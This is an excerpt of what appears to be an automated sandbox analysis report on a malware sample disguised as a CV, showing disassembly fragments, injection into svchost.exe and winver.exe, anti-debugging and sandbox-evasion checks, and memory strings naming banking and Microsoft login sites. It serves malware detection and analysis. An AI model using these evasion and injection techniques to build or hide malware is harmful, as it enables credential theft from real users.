                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413B33 pushfd ; ret 2_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033E0 push eax; ret 2_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144FC push edi; retf 2_2_004144FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415D23 push 00000009h; retn 3081h2_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408695 push edx; retf 2_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004086AF push edx; retf 2_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046909AD push ecx; mov dword ptr [esp], ecx5_2_046909B6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C237 push eax; iretd 5_2_0036C238
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C25C push esp; retf 5_2_0036C265
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035E310 push esi; ret 5_2_0035E317
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035E565 push ss; retf 5_2_0035E56B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00360750 pushfd ; ret 5_2_00360796
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003708C4 pushfd ; ret 5_2_003708CF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00362940 push 00000009h; retn 3081h5_2_003629E1
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003552B2 push edx; retf 5_2_003552CB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003552CC push edx; retf 5_2_003552CB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003636C9 push esp; retf 5_2_003636CA
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437C63C push ss; ret 5_2_0437C647
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_043706BB push eax; ret 5_2_043706D8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437C738 push FFFFFFC5h; iretd 5_2_0437C73A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04376025 push ss; ret 5_2_04376026
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437BEBC push es; iretd 5_2_0437BEC2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04374960 pushad ; retf 5_2_04374962
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437694C push ecx; ret 5_2_0437694D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04375A15 push edi; ret 5_2_04375A16
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04376ACC push edx; retf 5_2_04376AD4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00128111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00128111
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000DEB42
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E123A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI/Special instruction interceptor: Address: 1B278E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 1876Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 8097Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-94764
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-95835
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95304
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep count: 1876 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep time: -3752000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep count: 8097 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep time: -16194000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00106CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00106CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001060DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001063F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0010EB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010F56F FindFirstFileW,FindClose,0_2_0010F56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0010F5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00111B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00111C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00111F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C740 FindFirstFileW,FindNextFileW,FindClose,5_2_0036C740
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000DDDC0
                Source: 341G64J42.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 341G64J42.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 341G64J42.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: winver.exe, 00000005.00000002.4529420026.0000000007667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,116964286555a
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 341G64J42.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4525135369.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: 341G64J42.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 341G64J42.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 341G64J42.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 341G64J42.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A46000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2692018697.000002E63E81C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 341G64J42.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 341G64J42.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 341G64J42.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 341G64J42.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 341G64J42.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: winver.exe, 00000005.00000002.4529420026.0000000007667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtual_card_usage_datapageVMware20,116964286555a
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 341G64J42.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 341G64J42.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 341G64J42.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 341G64J42.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI call chain: ExitProcess graph end nodegraph_0-94518
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A83 LdrLoadDll,2_2_00417A83
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00116AAF BlockInput,0_2_00116AAF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000C3D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_000F3920
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DE01E LoadLibraryA,GetProcAddress,0_2_000DE01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_01B26550 mov eax, dword ptr fs:[00000030h]0_2_01B26550
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_01B27BB0 mov eax, dword ptr fs:[00000030h]0_2_01B27BB0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_01B27B50 mov eax, dword ptr fs:[00000030h]0_2_01B27B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
